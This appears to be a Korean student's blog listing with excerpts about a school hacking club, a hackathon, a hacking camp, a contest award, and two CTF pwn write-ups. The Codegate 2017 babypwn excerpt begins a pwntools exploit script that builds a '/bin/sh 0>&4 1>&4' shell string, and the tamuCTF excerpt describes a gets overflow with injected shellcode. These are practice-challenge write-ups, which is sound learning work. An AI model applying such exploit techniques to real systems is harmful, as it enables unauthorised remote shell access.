2018년 10월 16일 야자 2타임에 첫 번째 det's활동을 하게 되었습니다. 첫 시간인데도 불구하고 모든 학생이 출석해줘서 좋은 분위기로 시작할 수 있게 되었습니다. 이번에 수업을 하게 된 내용은, 해킹의 종류(web, pwnable, reversing etc...), 해커의 기본 소양, 해킹의 정의 등 해킹을 하기위한 기본적인 이야기들을 해주었고 간단한 CTF를 열어 해킹이 도대체 무엇인지., CTF(capture the flag)는 어떤 것인지 해킹을 하는 이유에 대해서 직접 느끼게 진행하였습니다. 기대도 많이 되고 걱정도 많이 되었지만, 무엇보다 학생들이 잘 따라와 주고, 재미있게 수업에 참여해줘서 즐거운 수업이었습니다.

10월13일~10월14일에 Inapse 해커톤에 참가했습니다. 이번 해커톤으로 기존까진 하지못했던 많은 경험들을 하게 되었고, 정말 많은점들을 느꼈습니다 :) 팀명 : umbrella은 가는 말이 고와야 오는 말이 곱다, 저희의 언어 순화 솔루션인 “고고” 를 개발하였습니다. 맨날 같이다녀주면서 귀엽고 훌륭한 디자인을 해주는 이승현 (SeungHyeon Lee) 첫 해커톤인데도 너무너무 잘해준 조성진 혼자서 모든 웹개발을 다해준 박태훈, 너무너무 고맙고 다들 수고 많았어요~!! (crackup) 이정도로 완성된 프로젝트를 개발한적은 처음이라 팀원들한테 너무너무 고마웠던 대회였습니다.CTF하고 오느라 늦어서 미안해..

안녕하세요~17회 해킹캠프 참여하고 두번째로 18회 해킹캠프에 참여하게 되었습니다.저번 17회 해킹캠프 당시에는 해킹에 대한 정보를 아무것도 몰랐지만 이번 18회 해킹캠프에서는 저번에 했었던 경험들을 바탕으로 열심히 학습해서 약간에 지식이 생겼었습니다. 그래서 이번에는 “흠… 포너블 한문제는 풀어볼까?” 라고 생각했었는데 저희팀에 시스템해킹을 잘하시는분이 계셔서 목표를 다시 잡았다. 다른친구랑 둘이서 미스크 올클을 해보기로하였다.시스템해킹도 좋아하지만 웹해킹 하는것도 좋아해서 심심할때 자주 들어가봤다. CTF가 모두 끝나고 나서 풀이를 들으니 웹 문자열 하나 안달아서 flag를 못찾았다.. ㅎㅎ.. 발표들은 첫번째날 두번째날 모두 해킹캠프에 참여하는 사람들인 초보자를 위한 발표 치고는 난의도가있었지만 그..

Codegate 2017 - babypwn 문제입니다. 카나리 익스 연습하려고 추천해주셔서 풀어봤습니다.원격으로 서버열어서 쉘따는 부분이 0>&4 1>&4 입출력 다 원격으로 바꾸는게 신기했습니다. 물론 저부분은 도움없었으면 못풀었을거에요 ㅠ 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950from pwn import * r = remote('127.0.0.1',6666)e = ELF('./babypwn') bss = 0x0804b1b8+0x32binsh = "/bin/sh 0>&4 1>&4"system_plt = e.plt['system']recv_plt = e.plt['recv']pppp..

카톡에서 개발자모집한다는 소리를 듣고 경험삼아 한번 "정보올림피아드 공모전"에 출전하였습니다. 그때는 예선탈락 예상하고 진짜 경험으로 한번 나가보자는 생각으로 임했는데 어떻게 팀원들이 잘이끌어줘서 계획서, 기획서, 부스운영 등 많은경험을 하게되었고 수상까지 하게되었습니다. "동상"이지만 이번경험을 토대로 많은 경험과 발전이 생긴거같습니다. 🙂 더 열심히 해야겠군요. xD

tamuCTF2018 pwn3번입니다. 가장먼저 nx가 걸려있지않아서 shellcode 삽입이 가능합니다. ida32bit로 한번 까보면 이렇게 나오고 gets에서 bof가 일어납니다. payload내부에 shellcode를 삽입해서 진행하면 되겠네요 ㅎㅎ 3번까지는 풀었는데 4번 파일을 찾고있습니다 ㅠㅠ 풀렸네요 ㅎ (grin)